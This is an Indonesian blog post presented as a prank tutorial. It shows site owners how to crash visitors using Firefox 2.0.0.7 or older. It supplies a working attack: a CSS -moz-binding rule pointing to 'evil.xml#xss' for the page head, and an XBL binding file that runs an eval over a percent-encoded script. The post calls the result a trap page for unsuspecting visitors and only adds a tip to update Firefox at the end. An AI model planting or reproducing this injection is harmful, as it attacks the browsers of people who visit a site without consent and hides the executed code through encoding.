Pengen ngerjai pengunjung? hehehe.. emangnya cuma pengunjung ajah yang bisa iseng, para admin jangan kalah iseng doong ;p Dengan beberapa script sederhana, anda bisa membuat Browser pengunjung anda mengalami crash. Target kita kali ini adalah para pengguna Mozilla Firefox V.2.0.0.7 kebawah.
Langkah 1
Salin script berikut dan letakkan diantara tag <HEAD> halaman situs anda:
<style>BODY{-moz-binding:url("evil.xml#xss")}</style>Misalnya:
2 | <head><style>BODY{-moz-binding:url("evil.xml#xss")}</style> |
3 | <title>Judul halaman</title> |
5 | <body>Isi halaman situs anda...</body> |
Langkah 2
Salin script berikut, simpan dengan nama evil.xml dan uploadlah di directory yang sama dengan halaman yang disisipi script di langkah pertama tadi.
1 | <?xml version="1.0"?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29')); ]]></constructor></implementation></binding></bindings> |
Cobalah akses halaman jebakan tadi menggunakan Mozilla Firefox V 2.0.0.7 kebawah. Browser anda akan mengalami Crash ^_^. Agar anda tidak mengalami nasib serupa, download ajah versi terbaru Mozilla Firefox.
Selamat mencoba..
0 komentar:
Posting Komentar